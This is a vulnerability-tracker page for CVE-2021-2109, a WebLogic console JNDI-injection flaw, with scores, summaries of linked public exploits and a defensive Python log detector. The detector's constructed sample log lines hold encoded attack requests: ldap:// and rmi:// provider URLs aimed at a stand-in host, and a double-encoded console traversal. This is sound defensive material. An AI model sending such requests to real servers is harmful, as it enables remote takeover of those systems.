CVE-2021-2109

Severity: HIGH · Exploited in the wild

Oracle WebLogic Server 10.3.6.0.0 through 14.1.1.0.0 (Console) - Authenticated RCE via JNDI injection


Exploitation Summary

CVE-2021-2109 has been observed exploited in the wild (reported by InTheWild.io). EIP tracks 7 public exploits from researchers including Photubias, Al1ex and rabbitsafe.

AI-analyzed exploit summary: the public exploits for CVE-2021-2109, an RCE vulnerability in the Oracle WebLogic Server administration console, use JNDI injection to make the server look up an attacker-controlled LDAP URL and load a malicious class, executing arbitrary commands on the target. Exploitation requires credentials for the console (CVSS PR:H) unless chained with a separate authentication bypass, and the attacker runs a Java-based LDAP listener to deliver the payload.

Description

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
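The summary and the exploit analyses on this page describe the attack as an HTTP request to the WebLogic console that carries a JNDI provider URL (ldap://, rmi://, ...) which the server then dereferences. An added example, not from this page or from any of the listed repositories: a small Python detector run over constructed WebLogic access-log lines. It fully percent-decodes each request targeting /console/, flags any query parameter whose decoded value contains a JNDI URL scheme, and separately flags encoded dot-segment traversal into the console path, the double-encoding trick used by WebLogic console authentication bypasses such as CVE-2020-14750 (the bypass the rabbitsafe PoC chains for its unauthenticated mode). The console page name, the parameter name `provider`, the hosts and the log lines are constructed for illustration; the actual console page and parameter used by the public PoCs are deliberately not reproduced.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample lines in NCSA common log format (not real traffic).
# Line 2: authenticated user sends an ldap:// provider URL to a console page.
# Line 3: unauthenticated client uses double-encoded ".." to reach the console,
#         then supplies an rmi:// provider URL.
# Line 5: ldap:// in a non-console request, which is out of scope here.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2021:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1810
10.0.0.7 - weblogic [20/Jan/2021:10:02:15 +0000] "GET /console/console.portal?_nfpb=true&provider=ldap%3A%2F%2F10.0.0.99%3A1389%2FExploit HTTP/1.1" 200 5120
10.0.0.9 - - [20/Jan/2021:10:03:40 +0000] "GET /console/css/%252e%252e/console.portal?provider=rmi%3A%2F%2F10.0.0.99%3A1099%2Fa HTTP/1.1" 200 5120
10.0.0.11 - - [20/Jan/2021:10:04:01 +0000] "GET /console/css/console.css HTTP/1.1" 200 900
10.0.0.12 - - [20/Jan/2021:10:05:09 +0000] "GET /app/search?q=ldap%3A%2F%2Fexample HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# URL schemes a javax.naming.InitialContext lookup will dereference.
JNDI_SCHEME = re.compile(r"\b(ldaps?|rmi|iiop|iiopname|corbaname|dns|nis|nds)://", re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so that %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target):
    """Return a list of finding strings for one request-target (path?query)."""
    findings = []
    parts = urlsplit(target)
    path = fully_decode(parts.path)
    if not path.lower().startswith("/console/"):
        return findings  # only the admin console is in scope for this rule
    if "/.." in path:
        findings.append("encoded dot-segment traversal inside /console/ path")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = fully_decode(value)
        m = JNDI_SCHEME.search(decoded)
        if m:
            findings.append(
                f"JNDI provider URL ({m.group(1).lower()}://) in parameter "
                f"'{name}': {decoded}"
            )
    return findings


def detect(log_text):
    """Run analyse_target over every parsable line; return hits with context."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_target(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "user": m.group("user"),
                "status": m.group("status"),
                # a "-" user field means the request carried no authenticated identity
                "authenticated": m.group("user") != "-",
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

The decode-then-match order matters: a WAF or log rule that inspects the raw request line misses both the double-encoded path and a percent-encoded `ldap%3A%2F%2F`. A hit with `authenticated` false and a traversal finding is the chained unauthenticated pattern; a hit from a named console user is what the base vulnerability alone looks like, and should be triaged as a compromised or malicious administrator account.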

Exploits (7)

exploitdb WORKING POC
by Photubias · python · webapps · java
https://www.exploit-db.com/exploits/49461

This exploit leverages CVE-2021-2109, an RCE vulnerability in Oracle WebLogic Server, by using JNDI injection to execute arbitrary commands on the target system. It requires authentication and uses a Java-based LDAP listener to achieve remote code execution.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Auth required
Prerequisites: Authenticated access to WebLogic console · Java runtime environment · JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar in the same directory
devstral-2 · analyzed Feb 16, 2026
nomisec WORKING POC 31 stars
by Al1ex · poc
https://github.com/Al1ex/CVE-2021-2109

This repository contains a functional exploit for CVE-2021-2109, a JNDI injection vulnerability in the Oracle WebLogic Server console. The exploit points the server at an attacker-controlled LDAP URL so that the JNDI lookup loads a malicious Java class from an accompanying HTTP server, achieving remote code execution (RCE).

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server (10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0)
Auth required
Prerequisites: Authenticated access to WebLogic Console · LDAP server hosting malicious payload · HTTP server to serve the exploit class
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC 9 stars
by rabbitsafe · poc
https://github.com/rabbitsafe/CVE-2021-2109

This repository contains a functional Python exploit for CVE-2021-2109, a JNDI injection vulnerability in Oracle WebLogic Server. The exploit uses an attacker-hosted LDAP server for remote code execution and supports both an authenticated path (console credentials) and an unauthenticated path that first chains the CVE-2020-14750 console authentication bypass.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server (10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0)
No auth needed (only when chained with the CVE-2020-14750 bypass; on its own the vulnerability requires console credentials)
Prerequisites: LDAP server for JNDI injection · Network access to WebLogic Server · Optional: Valid credentials for authenticated exploitation
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC 4 stars
by yuaneuro · poc
https://github.com/yuaneuro/CVE-2021-2109_poc

This repository contains a functional PoC for CVE-2021-2109, a JNDI injection vulnerability in Oracle WebLogic Server. The script sends a crafted HTTP request to the console that triggers a JNDI lookup against an attacker-controlled LDAP URL, relying on an external JNDIExploit server to deliver the payload class.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server
No auth needed (per the automated analysis; the vulnerability itself requires console credentials unless an authentication bypass is chained)
Prerequisites: External JNDIExploit server running · Target WebLogic Server accessible
devstral-2 · analyzed Feb 18, 2026
nomisec STUB 3 stars
by Vulnmachines · poc
https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109

The repository contains only a minimal README with a title and incorrect CVE reference (CVE-2022-2109 instead of CVE-2021-2109), with no exploit code, technical details, or additional content.

Classification
Stub 90%
Attack Type
Other
Complexity
Trivial
Reliability
Theoretical
Target: Oracle WebLogic
No auth needed
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC
by lnwza0x0a · poc
https://github.com/lnwza0x0a/CVE-2021-2109

This repository contains a functional exploit labelled as CVE-2021-2109 but targeting deserialization flaws in Adobe BlazeDS. It includes multiple serialization/deserialization utilities and a payload execution mechanism. Note that Adobe BlazeDS is not the product affected by CVE-2021-2109 (Oracle WebLogic Server), so the repository appears to be mislabelled and should not be treated as a WebLogic PoC.

Classification
Working Poc 95%
Attack Type
Deserialization
Complexity
Moderate
Reliability
Reliable
Target: Adobe BlazeDS
No auth needed
Prerequisites: Network access to vulnerable BlazeDS server · Java runtime environment
devstral-2 · analyzed Feb 18, 2026
nomisec SCANNER
by dinosn · poc
https://github.com/dinosn/CVE-2021-2109

This repository contains a Python script that scans for CVE-2021-2109 exposure in Oracle WebLogic by checking whether a specific console path is reachable. It does not exploit the vulnerability; a positive result indicates a potentially exposed console, not a confirmed vulnerable version.

Classification
Scanner 90%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Oracle WebLogic Server
No auth needed
Prerequisites: Network access to the target WebLogic server
devstral-2 · analyzed Feb 18, 2026

References (2)


Scores

CVSS v3 7.2
EPSS 0.7024
EPSS Percentile 99.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CISA SSVC (Vulnrichment)

Exploitation: none (CISA's decision-point value at enrichment time; contrast with the InTheWild.io report above)
Automatable: no
Technical Impact: total

Details

InTheWild.io 2021-12-04
Status published
Products (5)
oracle/weblogic_server 10.3.6.0.0
oracle/weblogic_server 12.1.3.0.0
oracle/weblogic_server 12.2.1.3.0
oracle/weblogic_server 12.2.1.4.0
oracle/weblogic_server 14.1.1.0.0
Published Jan 20, 2021
Tracked Since Feb 18, 2026